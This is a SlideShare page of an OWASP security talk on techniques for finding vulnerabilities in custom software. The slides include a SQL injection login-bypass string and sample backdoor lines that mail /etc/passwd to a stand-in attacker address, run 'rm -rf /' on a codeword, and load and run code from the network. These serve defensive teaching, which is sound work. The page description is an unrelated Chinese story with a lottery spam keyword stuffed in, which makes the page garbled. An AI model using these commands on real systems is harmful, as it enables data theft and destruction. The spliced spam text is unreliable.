The Art of Finding Flaws –  Techniques for Finding Vulnerabilities in Custom Software Jeff Williams CEO, Aspect Security C...
The Future Ingredients:  Sun Java 1.5 runtime, Sun J2EE 1.2.2, Jakarta log4j 1.5, Jakarta Commons 2.1, Jakarta Struts 2.0,...
Today <ul><li>Code is code </li></ul><ul><ul><li>All sectors </li></ul></ul><ul><ul><li>All languages </li></ul></ul><ul><...
Why Find Vulnerabilities? <ul><li>Nobody  believes their software is vulnerable </li></ul><ul><ul><li>“If the software wor...
Software Is A Black Box <ul><li>Complex </li></ul><ul><ul><li>Millions of lines of code </li></ul></ul><ul><ul><li>Layers ...
Key Vulnerabilities <ul><li>A few serious common vulnerabilities… </li></ul><ul><ul><li>Broken Access Control </li></ul></...
SQL Injection Illustrated Firewall Hardened OS Web Server App Server Firewall Databases Legacy Systems Web Services Direct...
Scanning for SQL Injection <ul><li>Method </li></ul><ul><ul><li>Use “signatures” to send malformed SQL commands </li></ul>...
Static Analysis for SQL Injection <ul><li>Method </li></ul><ul><ul><li>Automatically analyze source code for patterns </li...
Penetration Testing for SQL Injection <ul><li>Method </li></ul><ul><ul><li>Custom attacks by an expert security tester </l...
Code Review for SQL Injection <ul><li>Method </li></ul><ul><ul><li>Reviewer analyzes code for patterns </li></ul></ul><ul>...
Security Analysis Techniques Find Vulnerabilities Using the Running Application Find Vulnerabilities Using the Source Code...
Vulnerability Patterns <ul><li>public class DamagedStrutsForm extends ActionForm </li></ul><ul><li>{ </li></ul><ul><li>pub...
A Change In Perspective <ul><li>Think like an attacker! </li></ul><ul><ul><li>Understand how the application works </li></...
Getting Started <ul><li>Adopt the OWASP Top Ten </li></ul><ul><ul><li>Set the bar </li></ul></ul><ul><li>Spot check a few ...
OWASP Can Help <ul><li>Open Web Application Security Project </li></ul><ul><ul><li>Nonprofit Foundation </li></ul></ul><ul...
OWASP Supports Vulnerability Analysis <ul><li>OWASP Top Ten </li></ul><ul><ul><li>Set priorities, get management buy-in </...
Some of What You’ll Find at OWASP <ul><li>Community </li></ul><ul><ul><li>Local Chapters </li></ul></ul><ul><ul><li>Transl...
What Could a Malicious Developer Do? <ul><li>Trojan Horse runs for admin </li></ul><ul><ul><li>if ( System.getCurrentUser(...
Q&A A Q & Q U E S T I O N S A N S W E R S
Upcoming SlideShare
Loading in …5
×

香港六合彩

1,427 views

Published on

王峰不太愿意提子允和周晨晨的那种关系,结果还是触碰了,唉,别人的情网也法力无边。但事已至此,不好过分,作为好朋友,关键的时候怎么也该撑场子。那去就是,为了弟兄哪怕被王秀粘上四辈子也心甘,但你注意,我的灯泡很亮,菲利普2500瓦,够亮吧?我是它两个亮。没事,我本身光明正大,而且身上还背着发电机的。你老弟可要当心,别因为短路把身体给烧糊了。没事,那我就可以在烈火中永生了。《Y滋味》显文具店里中午放学后,四人汇聚到校门口边上的文具店里。显然两位女士没想到王峰会来,吃了一小惊。这又给了王秀展示厉害的机会,尽管香港六合彩平日与王峰不大熟,此时却搞得像三十年的老相识。哟,你也来啦?好啊,人多热闹。说完侧过脸坏笑着看子允,只不过赵大财主又要多破费了。子允跟王峰相视一笑,对香港六合彩说,如果钱不够,留下你给老板的儿子做童养媳。去,去,去,把晨晨留下差不多。哎,正经点儿,去哪吃饭?王秀向每个人扫一遍,一句话问了三个人。去麦当劳。王峰说。麦当劳吧。周晨晨跟道。我随便。子允的声音显得很突出。三个人很配合,被王秀这么一问,同时说出自己的想法。哎,香港六合彩两搞什么?回答得这么整齐?赵子允你可要小心了,王峰和晨晨很默契,强有力的竞争对手喔。王秀这句话很具煽动性,把王峰和晨晨弄得满脸通红。子允被牵其中,也红着脸不知看哪好。王秀,你说什么呀。周晨晨扯着香港六合彩的衣角小声责怪。就是,你这是挑拨香港六合彩兄弟感情,小心吃饭时王峰送你蹲厕所。子允趁机乱中添乱。打破混乱最好的方法就是让事情更混乱,子允一直这么认为。好,我同意,让香港六合彩吃不了兜着走。王峰扬起还在红着的脸,而且是在厕所吃不了兜着走。谈到厕所,女人最不好接招,王秀毫无还手之力,跟着傻笑。一般来说,一对一开损的时候不容易分出伯仲,如果二对一,那个一可就难有招架之力。假使三对一,那一的日子估计只有撕下脸自嘲一番才能逃过此劫。好了,既然两人都要去麦当劳,那香港六合彩抓紧时间吧,中午时间可不充裕。显然,子允对王秀的话很不在心,惦记着找机会用三对一的架式让香港六合彩乖巧一下嘴。到了麦当劳,子允和王峰主动担当起点餐任务,问清两位女生的需要后一起来到柜台排队点餐。周晨晨选了个靠窗的四人位子,然后单手托腮望着窗外卖红薯的老太太发呆。王秀则叽叽喳喳说终于敲诈到子允了。这头,子允正窃笑着王秀嘴大胃小,原以为香港六合彩真会让自己大把挥银,想不到香港六合彩只要了两对(又鸟)翅和一包大薯条,连饮料都是子允过意不去死活让香港六合彩要的。

Published in: Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
1,427
On SlideShare
0
From Embeds
0
Number of Embeds
12
Actions
Shares
0
Downloads
3
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide
  • 香港六合彩

    1. 1. The Art of Finding Flaws – Techniques for Finding Vulnerabilities in Custom Software Jeff Williams CEO, Aspect Security Chair, OWASP Foundation [email_address] 410-707-1487
    2. 2. The Future Ingredients: Sun Java 1.5 runtime, Sun J2EE 1.2.2, Jakarta log4j 1.5, Jakarta Commons 2.1, Jakarta Struts 2.0, Harold XOM 1.1rc4, Hunter JDOMv1 Software Facts Modules 155 Modules from Libraries 120 % Vulnerability* * % Vulnerability values are based on typical use scenarios for this product. Your Vulnerability Values may be higher or lower depending on your software security needs: Cross Site Scripting 22 65 % SQL Injection 2 Buffer Overflow 5 Total Security Mechanisms 3 Encryption 3 Authentication 15 95 % Modularity .035 Cyclomatic Complexity 323 Access Control 3 Input Validation 233 Logging 33 Expected Number of Users 15 Typical Roles per Instance 4 Reflected 12 Stored 10 Cross Site Scripting Less Than 10 5 Reflected Less Than 10 5 Stored Less Than 10 5 SQL Injection Less Than 20 2 Buffer Overflow Less Than 20 2 Security Mechanisms 10 14 Encryption 3 15 Usage Intranet Internet
    3. 3. Today <ul><li>Code is code </li></ul><ul><ul><li>All sectors </li></ul></ul><ul><ul><li>All languages </li></ul></ul><ul><ul><li>All platforms </li></ul></ul><ul><ul><li>All computing models </li></ul></ul><ul><ul><li>All sizes </li></ul></ul><ul><ul><li>Intra/Extra/Inter-net </li></ul></ul><ul><li>New types of vulnerabilities are rare </li></ul><ul><li>The market doesn’t value secure code </li></ul><ul><li>We trust code we shouldn’t </li></ul><ul><li>Cheaper, faster only </li></ul>We don’t have any idea whether our code is trustworthy or not
    4. 4. Why Find Vulnerabilities? <ul><li>Nobody believes their software is vulnerable </li></ul><ul><ul><li>“If the software works, then it must be secure” </li></ul></ul><ul><li>Finding flaws starts you on the path </li></ul>Find Flaws Fix Find Flaws Improve Find Flaws Improve If you’re not finding them, you’re allowing them
    5. 5. Software Is A Black Box <ul><li>Complex </li></ul><ul><ul><li>Millions of lines of code </li></ul></ul><ul><ul><li>Layers of leaky abstractions </li></ul></ul><ul><ul><li>Massively interconnected </li></ul></ul><ul><li>Compiled </li></ul><ul><ul><li>Difficult to reverse engineer </li></ul></ul><ul><ul><li>Different on every platform </li></ul></ul><ul><li>Legal Protections </li></ul><ul><ul><li>No peeking </li></ul></ul><ul><ul><li>We’re not liable </li></ul></ul>
    6. 6. Key Vulnerabilities <ul><li>A few serious common vulnerabilities… </li></ul><ul><ul><li>Broken Access Control </li></ul></ul><ul><ul><li>Weak Authentication and Session Management </li></ul></ul><ul><ul><li>SQL Injection </li></ul></ul><ul><ul><li>Cross Site Scripting </li></ul></ul><ul><li>For more information see… </li></ul><ul><ul><li>The Top Ten Most Critical Web Application Vulnerabilities ( www.owasp.org/documentation/topten.html ) </li></ul></ul><ul><ul><li>A Guide to Building Secure Web Applications and Web Services ( www.owasp.org/documentation/guide.html ) </li></ul></ul>
    7. 7. SQL Injection Illustrated Firewall Hardened OS Web Server App Server Firewall Databases Legacy Systems Web Services Directories Human Resrcs Billing Custom Code APPLICATION ATTACK Network Layer Application Layer Accounts Finance Administration Transactions Communication Knowledge Mgmt E-Commerce Bus. Functions HTTP request  SQL query  DB Table  HTTP response  “ SELECT * FROM users WHERE user=‘ ’ OR 1=1-- ’ AND pass=‘password’” 1. Application presents a login form to the attacker 2. Attacker sends an attack in the form data 3. Application forwards attack to the database in a SQL query Successful Login “ Welcome, Alice” 4. Database runs query containing attack and sends results to application 5. Application thinks login worked and sends welcome page
    8. 8. Scanning for SQL Injection <ul><li>Method </li></ul><ul><ul><li>Use “signatures” to send malformed SQL commands </li></ul></ul><ul><ul><li>Analyze responses to see if it “worked” </li></ul></ul><ul><ul><li>Nessus, nikto, absinthe </li></ul></ul><ul><li>Pros </li></ul><ul><ul><li>Requires only network access to application </li></ul></ul><ul><ul><li>Fast and easy to run </li></ul></ul><ul><li>Cons </li></ul><ul><ul><li>May only exercise part of an application </li></ul></ul><ul><ul><li>Prone to false alarms and missed positives </li></ul></ul><ul><ul><li>Results indicate URL but not line of code </li></ul></ul><ul><ul><li>Can be problems with credentials, roles, and SSL </li></ul></ul>
    9. 9. Static Analysis for SQL Injection <ul><li>Method </li></ul><ul><ul><li>Automatically analyze source code for patterns </li></ul></ul><ul><ul><li>Tools load source code, compile, and analyze </li></ul></ul><ul><li>Pros </li></ul><ul><ul><li>Requires only the software baseline </li></ul></ul><ul><ul><li>Fast and easy to run </li></ul></ul><ul><li>Cons </li></ul><ul><ul><li>Can’t factor in the runtime environment </li></ul></ul><ul><ul><li>Prone to false alarms and missed positives </li></ul></ul><ul><ul><li>Results indicate line of code but not URL </li></ul></ul><ul><ul><li>Doesn’t find design problems </li></ul></ul>
    10. 10. Penetration Testing for SQL Injection <ul><li>Method </li></ul><ul><ul><li>Custom attacks by an expert security tester </li></ul></ul><ul><ul><li>Use OWASP WebScarab to craft custom attacks </li></ul></ul><ul><ul><li>Expert analyzes responses to see if attack worked </li></ul></ul><ul><li>Pros </li></ul><ul><ul><li>Open source tools available </li></ul></ul><ul><ul><li>Recommend an internal team </li></ul></ul><ul><li>Cons </li></ul><ul><ul><li>Requires expertise in security, software, and SQL </li></ul></ul><ul><ul><li>Difficult to exercise the entire application </li></ul></ul><ul><ul><li>Tester may not be able to determine success </li></ul></ul>
    11. 11. Code Review for SQL Injection <ul><li>Method </li></ul><ul><ul><li>Reviewer analyzes code for patterns </li></ul></ul><ul><ul><li>Use tools to view baseline in different ways </li></ul></ul><ul><ul><li>Examine mechanisms, common vulnerability areas </li></ul></ul><ul><li>Pros </li></ul><ul><ul><li>Cost-effective </li></ul></ul><ul><ul><li>Can examine the entire baseline </li></ul></ul><ul><li>Cons </li></ul><ul><ul><li>Can’t factor in the runtime environment </li></ul></ul><ul><ul><li>Requires skills in software and security </li></ul></ul>
    12. 12. Security Analysis Techniques Find Vulnerabilities Using the Running Application Find Vulnerabilities Using the Source Code Automated Vulnerability Scanning Automated Static Code Analysis Manual Penetration Testing Manual Code Review Combining All Four Techniques is Most Effective
    13. 13. Vulnerability Patterns <ul><li>public class DamagedStrutsForm extends ActionForm </li></ul><ul><li>{ </li></ul><ul><li>public void doForm( HttpServletRequest request) { </li></ul><ul><li>UserBean u = session.getUserBean(); </li></ul><ul><li>u.setName(request.getParameter(&quot;name&quot;)); </li></ul><ul><li>u.setFavoriteColor(request.getParameter(&quot;color&quot;)); </li></ul><ul><li>} </li></ul><ul><li>public boolean validate( HttpServletRequest request) { </li></ul><ul><li>try { </li></ul><ul><li>if ( request.getParameter(&quot;Name&quot;).indexOf(&quot;<scri&quot;) != -1 ) { </li></ul><ul><li>logger.log(&quot;Script detected&quot; ); </li></ul><ul><li>return false; </li></ul><ul><li>} </li></ul><ul><li>} </li></ul><ul><li>catch( Exception e ) {} </li></ul><ul><li>return true; </li></ul><ul><li>} </li></ul><ul><li>} </li></ul>Failure to Validate Blacklist Validation Fail Open Failure to Validate Time of Check, Time of Use Failure to Validate
    14. 14. A Change In Perspective <ul><li>Think like an attacker! </li></ul><ul><ul><li>Understand how the application works </li></ul></ul><ul><ul><li>Especially the security mechanisms </li></ul></ul><ul><ul><li>How does the application make security decisions </li></ul></ul><ul><li>The easy part? </li></ul><ul><ul><li>Test and analyze for a single vulnerability </li></ul></ul><ul><li>The hard part? </li></ul><ul><ul><li>Do an entire application for all types of vulnerabilities </li></ul></ul>
    15. 15. Getting Started <ul><li>Adopt the OWASP Top Ten </li></ul><ul><ul><li>Set the bar </li></ul></ul><ul><li>Spot check a few applications </li></ul><ul><ul><li>Are your security mechanisms easy to understand? </li></ul></ul><ul><ul><li>Are you doing validation, error handling, logging, etc? </li></ul></ul><ul><li>Get security out in the open! </li></ul><ul><li>Come to my talk later to find out more!!! </li></ul>
    16. 16. OWASP Can Help <ul><li>Open Web Application Security Project </li></ul><ul><ul><li>Nonprofit Foundation </li></ul></ul><ul><ul><li>All materials available under approved open source licenses </li></ul></ul><ul><ul><li>Dozens of projects, over 50 chapters worldwide, thousands of participants, and millions of hits a month </li></ul></ul>OWASP is dedicated to finding and fighting the causes of insecure software
    17. 17. OWASP Supports Vulnerability Analysis <ul><li>OWASP Top Ten </li></ul><ul><ul><li>Set priorities, get management buy-in </li></ul></ul><ul><li>OWASP Guide </li></ul><ul><ul><li>300 page book for application security </li></ul></ul><ul><li>OWASP Testing Guide </li></ul><ul><ul><li>Test/analysis methods for application security </li></ul></ul><ul><li>OWASP WebScarab </li></ul><ul><ul><li>Web application & web service penetration tool </li></ul></ul>
    18. 18. Some of What You’ll Find at OWASP <ul><li>Community </li></ul><ul><ul><li>Local Chapters </li></ul></ul><ul><ul><li>Translations </li></ul></ul><ul><ul><li>Conferences </li></ul></ul><ul><ul><li>Mailing Lists </li></ul></ul><ul><ul><li>Papers </li></ul></ul><ul><ul><li>and more… </li></ul></ul><ul><li>All free and open source </li></ul><ul><li>We encourage your company to support us by becoming a member </li></ul><ul><li>Documentation </li></ul><ul><ul><li>Guide </li></ul></ul><ul><ul><li>Top Ten </li></ul></ul><ul><ul><li>Testing </li></ul></ul><ul><ul><li>Legal </li></ul></ul><ul><ul><li>AppSec FAQ </li></ul></ul><ul><ul><li>and more… </li></ul></ul><ul><li>Tools </li></ul><ul><ul><li>WebGoat </li></ul></ul><ul><ul><li>WebScarab </li></ul></ul><ul><ul><li>Stinger </li></ul></ul><ul><ul><li>DotNet </li></ul></ul><ul><ul><li>and more… </li></ul></ul>
    19. 19. What Could a Malicious Developer Do? <ul><li>Trojan Horse runs for admin </li></ul><ul><ul><li>if ( System.getCurrentUser().getName().equals( “admin” ) ) </li></ul></ul><ul><ul><li>Runtime.exec( “sendmail hacker@badguys.com < /etc/passwd” ); </li></ul></ul><ul><li>Secret trigger removes all files on root partition </li></ul><ul><ul><li>if( req.getParameter( “codeword” ).equals( “eagle” ) ) </li></ul></ul><ul><ul><li>Runtime.exec( “rm –rf /” ); </li></ul></ul><ul><li>Randomly corrupt data one time in 100 </li></ul><ul><ul><li>if ( Math.random() < .01 ) bean.setValue( “corrupt” ); </li></ul></ul><ul><li>Load and execute code from remote server </li></ul><ul><ul><li>((A)(ClassLoader.getSystemClassLoader().defineClass </li></ul></ul><ul><ul><li>(null,readBytesFromNetwork(),0,422).newInstance())).attack(); </li></ul></ul><ul><li>Make backdoor look like inadvertent mistake </li></ul><ul><ul><li>if ( input < 0 ) throw new RuntimeException( “Input error” ); </li></ul></ul><ul><ul><li>Impossible to tell malicious from mistake </li></ul></ul><ul><ul><li>Who wrote the libraries your application uses? </li></ul></ul>
    20. 20. Q&A A Q & Q U E S T I O N S A N S W E R S

    ×